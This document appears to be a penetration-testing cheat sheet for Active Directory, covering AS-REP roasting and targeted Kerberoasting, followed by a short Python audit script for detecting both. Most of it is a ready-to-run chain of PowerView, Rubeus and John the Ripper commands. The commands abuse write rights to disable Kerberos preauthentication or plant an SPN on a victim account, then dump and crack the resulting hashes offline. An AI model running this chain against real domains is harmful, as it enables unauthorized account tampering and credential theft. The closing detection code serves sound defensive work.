If a user’s UAC setting has “Do not require Kerberos preauthentication” enabled, i.e. Kerberos preauth is disabled, it is possible to grab the user’s crackable AS-REP and brute-force it offline. With sufficient rights over the user object (GenericWrite or GenericAll), Kerberos preauth can be force-disabled as well.
Enumerating accounts with preauth disabled
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Force disable Kerberos Preauth
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "groupname"}
Set-DomainObject -Identity userofthatgroup -XOR @{useraccountcontrol=4194304} -Verbose   # 4194304 = 0x400000 = DONT_REQ_PREAUTH; -XOR toggles that bit
Get-DomainUser -PreauthNotRequired -Verbose
Get-ASREPHash -UserName username -Verbose
Invoke-ASREPRoast -Verbose
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt

Leveraging permissions to change a user’s SPN
- With enough rights (GenericAll/GenericWrite) over a target user, its SPN can be set to anything (it must be unique in the domain).
- We can then request a TGS for that SPN without special privileges. The TGS can then be Kerberoasted.
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "groupname"}
Get-DomainUser -Identity userofthatgroup | select serviceprincipalname
Get-ADUser -Identity userofthatgroup -Properties ServicePrincipalName | select ServicePrincipalName
Set-DomainObject -Identity userofthatgroup -Set @{serviceprincipalname='service/serviceprovider'}
Set-ADUser -Identity userofthatgroup -ServicePrincipalNames @{Add='service/serviceprovider'}
Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt
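As an added defender-side example (not part of the original notes), this Python snippet audits the two things the commands above manipulate: it flags accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit (0x400000), and it triages event lines for 4768 TGT requests logged with Pre-Authentication Type 0 (an AS-REP issued without preauth) and 4769 TGS requests using RC4 (0x17), the usual Kerberoast signature. The key=value event format, the account names and the service name are assumptions constructed for the demo.

```python
"""Audit helpers for AS-REP roasting and targeted Kerberoasting exposure."""

DONT_REQ_PREAUTH = 0x400000  # 4194304, the bit -XOR flips in the command above


def preauth_disabled(uac: int) -> bool:
    """True when the DONT_REQ_PREAUTH bit is set in a userAccountControl value."""
    return bool(uac & DONT_REQ_PREAUTH)


def audit_uac(accounts):
    """Return names whose userAccountControl has preauth disabled.
    `accounts` is a list of (sAMAccountName, userAccountControl) pairs."""
    return [name for name, uac in accounts if preauth_disabled(uac)]


# Constructed sample: normal user (512), user with preauth disabled
# (512 | 0x400000 = 4194816), disabled account (514).
SAMPLE_ACCOUNTS = [("alice", 512), ("svc-backup", 4194816), ("bob", 514)]


def parse_event(line: str) -> dict:
    """Split a constructed 'key=value key=value' event line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


# Constructed 4768/4769 events reduced to the fields that matter. Real events
# carry "Pre-Authentication Type" and "Ticket Encryption Type" as named fields.
SAMPLE_EVENTS = """\
EventID=4768 Account=alice PreAuthType=2 EncType=0x12
EventID=4768 Account=svc-backup PreAuthType=0 EncType=0x17
EventID=4769 Account=bob Service=service/serviceprovider EncType=0x17
EventID=4769 Account=alice Service=krbtgt EncType=0x12
""".splitlines()


def kerberos_alerts(lines):
    """Return (account, reason) for events worth a closer look:
    4768 with PreAuthType 0 -> AS-REP handed out without preauth (roastable)
    4769 with EncType 0x17  -> RC4 service ticket; legacy clients also do this,
                               so correlate with the requested service name."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0":
            alerts.append((ev["Account"], "AS-REP without preauth"))
        elif ev.get("EventID") == "4769" and ev.get("EncType", "").lower() == "0x17":
            alerts.append((ev["Account"], "RC4 TGS for " + ev.get("Service", "?")))
    return alerts
```

Feeding real values in (userAccountControl from Get-ADUser, the two event IDs from the DC security log) turns this into a periodic check that both preauth flips and fresh SPNs being roasted show up promptly.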